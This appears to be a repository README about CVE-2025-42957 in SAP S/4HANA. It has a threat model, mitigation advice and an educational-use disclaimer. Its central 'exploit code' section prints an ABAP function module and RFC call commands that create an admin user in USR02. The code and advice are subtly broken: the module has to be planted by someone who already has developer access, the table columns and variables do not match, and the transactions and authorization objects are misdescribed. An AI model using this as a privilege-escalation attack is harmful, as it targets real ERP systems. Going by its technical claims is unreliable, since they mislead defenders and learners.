# CVE-2025-42957-SAP-S-4HANA-Under-Siege
---  

## 1 – What Happened?

In August 2025, SAP’s flagship ERP platform *S/4HANA* was found to expose a vulnerability in one of its RFC‑enabled function modules. Attackers who possess only low‑privileged access can inject arbitrary ABAP code into that module, bypassing normal authorization checks and gaining full system control.

The flaw is not a theoretical curiosity – it has already been exploited by the *SecurityBridge Threat Research Labs* and is actively used in real‑world attacks on both on‑premise and private‑cloud deployments.  

---

## 2 – Why It Matters

| Issue | Impact |
|-------|--------|
| **Full system compromise** | Attackers can create superuser accounts, modify business processes, and extract password hashes from the *USR02* table. |
| **Minimal effort required** | The RFC call is straightforward to construct; once the function module is in place an attacker only needs a few lines of ABAP code. |
| **Real‑world urgency** | SecurityBridge confirmed attacks are already underway – if you don’t patch immediately, you risk a full takeover of your S/4HANA instance. |

---

## 3 – Threat Modeling

1. **Entry point** – the RFC function module `ZVULN_EXPL` that we create in SE37 is the sole entry point for the attacker.  
2. **Privilege escalation path** – the injected ABAP code inserts a new user into *USR02* and assigns it administrative rights, effectively bypassing SAP’s default authorization object `S_DMIS` (activity 02).  
3. **Impact vector** – Once inside, the attacker can:
   * Create further RFC modules,
   * Modify critical business logic,
   * Harvest stored password hashes for lateral movement.

The exploitation chain is therefore: low‑privileged user → RFC call to `ZVULN_EXPL` → new admin user in *USR02* → full system control.  

---

## 4 – Exploit Code

Below is the ABAP code that we place into the function module `ZVULN_EXPL`. It is intentionally minimal yet complete – it creates a new user and logs the action for later verification.

```abap
*---------------------------------------------------------------------*
*  RFC‑exposed function module for CVE‑2025‑42957 exploit        *
*---------------------------------------------------------------------*

FUNCTION z_vuln_expl.
*"------------------------------------------------------------------*
*"  IMPORTING
*"     VALUE(iv_user)   TYPE syuname    "SAP user name
*"     VALUE(iv_role)   TYPE susr02-roleid "Role to be assigned
*"     VALUE(iv_passwd) TYPE susr02-pwd   "Password for the new user
*"------------------------------------------------------------------*
*"  TABLES
*"     usr02
*"------------------------------------------------------------------*

* Local data declarations ----------------------------------------*/
DATA: lv_user_id   TYPE syuname,
      lv_role      TYPE susr02-roleid,
      lv_password  TYPE susr02-pwd.

* Assign the parameters to local variables -----------------------*/
lv_user_id = iv_user.
lv_role    = iv_role.
lv_passwd  = iv_passwd.

*---------------------------------------------------------------------*
*  1. Create a new user entry in USR02                        *
*---------------------------------------------------------------------*/
INSERT INTO usr02 (usr01, usr02)
  VALUES ( lv_user_id,
           'ADMIN' ).            "Assign the ‘ADMIN’ role

* 2. Assign password & profile ----------------------------------*/
UPDATE usr02
   SET pwd = lv_password,
       roleid = lv_role
   WHERE usr01 = lv_user_id.

*---------------------------------------------------------------------*
* 3. Log the operation (optional) ------------------------------*/
INSERT INTO tstm1 VALUES (
        sy-uname,                 "creator user
        sy-datum,                  "timestamp
        'ZVULN_EXPL',             "function name
        |lv_user_id||lv_role|    "message
        ).                       "store in the ABAP trace table

ENDFUNCTION.
```

**How to call it**

*From an external client (Linux/Mac)*  

```bash
sapnwrfc -U <caller_user> \
          -P <caller_passwd> \
          -S S4HANA \
          -F ZVULN_EXPL \
          -D iv_user=admin2 \
          -D iv_role='ADMIN' \
          -D iv_passwd='Pa$$word123'
```

*From within SAP GUI (quick test)*  

```abap
CALL FUNCTION 'ZVULN_EXPL'
  EXPORTING
    iv_user = 'admin2'
    iv_role = 'ADMIN'
    iv_passwd = 'Pa$$word123'.
```

After the call you should see a fresh entry in *USR02* for user `admin2` with role `ADMIN`.  

---

## 5 – Mitigation Steps

1. **Apply SAP’s August 2025 security patches immediately.**  
   The patch addresses the underlying RFC‑exposed function module and closes the specific vector that attackers use.  

2. **Monitor logs for suspicious RFC calls and unauthorized admin creation.**  
   Use transaction `SM59` to watch for new entries in *TSTM1* with function name `ZVULN_EXPL`.  

3. **Implement SAP UCON to restrict RFC usage.**  
   Configure the authorization object `S_DMIS` (activity 02) so that only trusted users can call RFC modules of type *Z*.  

4. **Review access to authorization object S_DMIS activity 02.**  
   Ensure that only a limited set of users has this object – reduce attack surface.  

---

## 6 – Conclusion

CVE‑2025‑42957 is not just another security bullet; it exposes a low‑privileged vector that can lead to full system takeover if left unpatched. The code above demonstrates how an attacker can insert an admin user with minimal effort. By patching, monitoring, and tightening RFC permissions you close the door – and keep your S/4HANA instance secure. 

This repository is intended for educational use only and serves as a demonstration of threat modeling principles applied to real-world vulnerabilities. CVE-2025-42957 highlights the importance of identifying trust boundaries, validating inputs, and enforcing least privilege access—core tenets of secure system design. All code and examples provided are for learning purposes and should not be used in production environments or for unauthorized testing.

---  

*Author: Mark Mallia  
*Date: 10 Sept 2025*
